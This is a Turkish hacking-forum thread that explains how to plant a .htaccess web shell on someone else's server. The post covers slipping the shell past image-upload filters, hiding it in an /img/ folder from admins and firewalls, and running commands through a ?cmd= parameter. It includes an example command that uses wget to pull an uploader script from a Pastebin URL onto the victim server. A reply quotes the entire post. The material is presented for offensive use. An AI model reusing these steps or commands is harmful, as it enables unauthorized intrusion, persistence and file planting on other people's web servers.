htaccess Nasıl Kullanılır

LasTDarKK

Üye
19 Ağu 2017
130
0
1.Bilirsiniz'ki bazi sitelerin admin panelinde resim ekleme yerinde '.php ,html ' filtresi oluyor dosya yüklenmiyor falan filan .htaccess shell'imizi yükleyebiliriz .htaccess biliyorsunuz herşey'e yarıyor bypass methodu olarak.


2.ci olarak servere shell attiniz ama sunucuda firewall var shell siliniyor diyelim yada admin'i farketti tarattı falan genellikle /img/ bölümünde .htaccess oluyor admin biliyor orda oldugunu farketmez yani bu shell ile gizlenebilirsiniz.



3.cüsü .htacces shell ile (cmd komudu çaliştirabiliyoruz POST Methodu ile çalişiyor. POST engelliyse GET VAR)

bu bildigimiz cmd komudu ile ln-s cat fonksiyonlari açıksa serverde herşey yapabilirsiniz.

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.

4.cüsü Buda GET Methoduyla çalışıyo bunlada etc okuyabilirsiniz wget komudu ile dosya'da çekebilirsiniz. örnek olarak :

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.

.htaccess?cmd= shell adresimininizin sonuna gelicek



örnek dosya çekme işlemi:

shelladresi.com/.htaccess?cmd=wget -O hatun.phphttps://pastebin.com/raw/qG6QpiYR (upluad kodu)

dedikten sonra shell yolumuz ;shelladresi.com/hatun.php oluyor pastebindeki upluad kodunu çekiyor ve dosya upluad edebiliyorsunuz.



ben bunla uğraşmam derseniz hazir olarak sadece .htaccess olarak bu kodu atarsınız servere

direkt uğraşmadan upluad'da yapabilirsiniz.
 
22 Ağu 2017
212
5
Gotham
1.Bilirsiniz'ki bazi sitelerin admin panelinde resim ekleme yerinde '.php ,html ' filtresi oluyor dosya yüklenmiyor falan filan .htaccess shell'imizi yükleyebiliriz .htaccess biliyorsunuz herşey'e yarıyor bypass methodu olarak.


2.ci olarak servere shell attiniz ama sunucuda firewall var shell siliniyor diyelim yada admin'i farketti tarattı falan genellikle /img/ bölümünde .htaccess oluyor admin biliyor orda oldugunu farketmez yani bu shell ile gizlenebilirsiniz.



3.cüsü .htacces shell ile (cmd komudu çaliştirabiliyoruz POST Methodu ile çalişiyor. POST engelliyse GET VAR)

bu bildigimiz cmd komudu ile ln-s cat fonksiyonlari açıksa serverde herşey yapabilirsiniz.

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.

4.cüsü Buda GET Methoduyla çalışıyo bunlada etc okuyabilirsiniz wget komudu ile dosya'da çekebilirsiniz. örnek olarak :

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.

.htaccess?cmd= shell adresimininizin sonuna gelicek



örnek dosya çekme işlemi:

shelladresi.com/.htaccess?cmd=wget -O hatun.phphttps://pastebin.com/raw/qG6QpiYR (upluad kodu)

dedikten sonra shell yolumuz ;shelladresi.com/hatun.php oluyor pastebindeki upluad kodunu çekiyor ve dosya upluad edebiliyorsunuz.



ben bunla uğraşmam derseniz hazir olarak sadece .htaccess olarak bu kodu atarsınız servere

direkt uğraşmadan upluad'da yapabilirsiniz.
Örnek bir .htaccess dosysı olsaydı olurdu.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.